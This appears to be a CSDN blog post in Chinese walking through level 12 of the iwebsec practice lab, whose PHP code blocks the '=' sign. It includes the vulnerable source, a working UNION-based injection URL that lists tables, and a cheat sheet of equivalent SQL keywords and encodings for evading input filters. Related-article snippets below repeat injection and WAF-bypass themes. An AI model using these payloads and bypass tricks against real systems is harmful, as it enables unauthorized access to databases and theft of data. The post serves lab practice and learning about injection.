iwebsec sql-等价函数替换过滤绕过

最新推荐文章于 2024-11-06 00:15:00 发布
最新推荐文章于 2024-11-06 00:15:00 发布
阅读量198 收藏
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134526395
版权

12-等价函数替换过滤绕过

打开如下:

在这里插入图片描述

分析代码:

<?php
  if(isset($_GET['id'])){
	if (preg_match('/=/', $_GET["id"])) {
		die("ERROR");
	}else{
		$id=$_GET['id'];
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error());
//	echo "</font>";
	}

?>

preg_match 函数过滤了 = ,可以考虑等价绕过

构造注入语句:

http://localhost:8050/sqli/12.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like database()

等价关键字大全:

hex()bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()substr() ==> substring()

updatexml、extractvalue() ==> polygon()

@@user ==> user()

@@datadir ==> datadir()

and ==> &&

or ==> ||

not ==> !

xor ==> |

= ==> like,rlike,regexp

!= ==> <>

limit 0,1 ==> limit 1 offset 0

union select ==> union select * from (select 1)a join (select 2)b

’‘ ==> ""

'admin' ==> 0x61646D696E

select * from users where id = 1 order 4 ==> select * from users where id = 1 into @a,@b,@c,@d

正在努力…
关注
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行注入攻击,其中联合查询和盲注是两种主要的方式。 1. 联合查询显注绕过逗号 在传统SQL注入中,通常...
iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过
mooyuan的博客
12-02 939
总结 SQL注入主要分析几个内容 (1)闭合方式是什么?iwebsec的第12关关卡为数字型,无闭合 (2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功 (3)是否过滤了关键字?很明显通过源码,iwebsec的第12关卡过滤了等号关键字 了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的等号过滤绕过SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
从一个简单的SQL来聊聊等价改写
Focus on PostgreSQL
02-16 1010
今天看到一个库的cpu告警,去看了下top sql就发现了一个奇葩的SQL。 不得不吐槽下,都2022年了,还有在索引列上用函数的写法。。 其实也很好理解这个SQL是希望查询时间列是当天(current_date)的,但是由于该时间列是timestamp类型的,而current_date的结果是date类型的,所以开发人员将这两个时间用函数进行了截断。 那这个SQL该怎么优化呢,可能大部分人第一反应是加个函数索引不就好了,不过说实话函数索引大部分都显得有些多余,尤其是该列上都已经存在一个索
SQL注入中常见的函数_sql注入常见函数(1)
2301_77033340的博客
04-12 895
取出来的数据以数组形式存储,可以观察到确实存在关联与数字键的数组。
SQL Server正则表达式 替换函数应用详解
01-19
SQL正则替换函数 代码如下: CREATE function dbo.regexReplace ( @source ntext, –原字符串 @regexp varchar(1000), –正则表达式 @replace varchar(1000), –替换值 @globalReplace bit = 1, –是否是全局替换 @...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
摸鱼大数据-Spark SQL-Spark SQL函数定义
06-29
Spark SQL函数定义资源
SQL学习四-聚集函数
12-17
SQL学习四-聚集函数
SQL 常用更新操作
Fisher3652的博客
11-05 121
SQL 常用更新操作
Flink SQL
qq_41081716的博客
11-05 186
以上步骤展示了如何使用 Flink SQL 从 Kafka 读取数据、进行聚合计算,并将结果分别写入 MySQL 和 HDFS。这是一个基本的流程,根据实际需求,可以调整表结构、连接器配置以及 SQL 查询以适应不同的应用场景。
PostgreSQL 时间函数操作
云端的博客
10-31 156
PostgreSQL 时间函数操作
SQL50】day 1
m0_73629042的博客
11-05 233
使用不等于符号无法筛选null情况。
SQL实战进阶】——视图的定义、使用
jd1813346972的博客
11-02 1021
该篇文章主要利用15个案例帮助读者快速掌握SQL的视图相关用法,涉及视图的创建、删除、更新、更改等等。
使用PostgreSQL进行高效数据管理
qq_36287830的博客
11-01 1140
PostgreSQL是一个开源的关系型数据库管理系统,以其可靠性和强大的功能而著称。它支持SQL标准,并提供了许多高级功能,如事务完整性、多版本并发控制(MVCC)、复杂查询、外键、触发器、视图、事务等。通过本文,你已经学习了如何使用PostgreSQL进行高效的数据管理。我们介绍了PostgreSQL的基本概念、安装方法、配置PostgreSQL、基本操作、性能优化、备份和恢复、高级特性(分区表、全文搜索、地理空间数据)、监控和日志、故障排除等内容。
第三十三章:docker 启动mysql web管理工具- MyWebSQL
RodJohnsonDoctor的专栏
11-02 179
MyWebSQL 是一个基于 Web数据库管理工具,它允许用户通过浏览器管理 MySQL 数据库。优势跨平台性:MyWebSQL 作为一个 Web 应用,可以在任何有浏览器的环境中使用,这提供了比传统桌面应用程序更好的跨平台能力 20。简易安装:MyWebSQL 的安装过程非常简单,只需下载并解压到 Web 服务器的文件夹中,无需复杂的配置 20。开源免费:MyWebSQL 是完全开源的软件,这意味着用户可以免费使用,并根据自己的需要进行修改和定制
时间段比较与 SQL 实现:交集、并集与补集
最新发布
XMYX-0
11-06 1224
时间段比较是一个非常常见的操作,尤其是在涉及调度、事件分析和时间管理的应用中。通过掌握 SQL 中关于时间段交集、并集和补集的查询方式,我们能够高效地处理时间段相关的数据。希望本文的示例和分析能帮助你更好地理解并运用这些操作。
sql题库中常见问答
qq_42217078的博客
10-31 1004
①、drop和truncate属于数据库的定义语言(DDL)②、delete属于数据库的操作语言(DML)③、drop可以删除全表结果,且删除的同时会删除表数据④、delete 和truncate只能删除表数据,truncate会删除表数据一起删除表结构并且创建一张空表⑤、delete可以带条件删除,truncate不能带条件删除。
SQL实战训练之,力扣:1843. 可疑银行账户
qq_30900519的博客
11-01 1170
type 是枚举类型(包含'Creditor','Debtor'),其中 'Creditor' 表示用户向其账户存入资金,'Debtor' 表示用户从其账户取出资金。可见收入在5月与7月超过了最大收入,但6月没有。因为账户没有没有连续两月超过最大收入,账户4不列入结果表中。- 在 2021年6月,用户收入为 107100 + 102100 + 90900 = 300100。可见收入连续两月超过21000的最大收入,因此账户3列入结果表中。- 在 2021年7月,用户收入为 64900。
SQL,力扣题目1767,寻找没有被执行的任务对【递归】
m0_59659684的博客
11-01 563
task_id 表示的为主任务的id,每一个task_id被分为了多个子任务(subtasks),subtasks_count表示为子任务的个数(n),它的值表示了子任务的索引从1到n。编写解决方案报告没有被执行的(主任务,子任务)对,即没有被执行的(task_id, subtask_id)。每一行表示标记为task_id的主任务与标记为subtask_id的子任务被成功执行。,对于每一个task_id,subtask_id
SQL注入技巧:绕过逗号过滤方法总结
"这篇文档主要介绍了SQL注入中的过滤逗号注入问题及其解决方案,通过各种方法绕过逗号的过滤限制,包括使用fromto、join、like以及limit的offset技巧。同时,文中还提到了一些CTF比赛中的实际题目作为示例,帮助理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值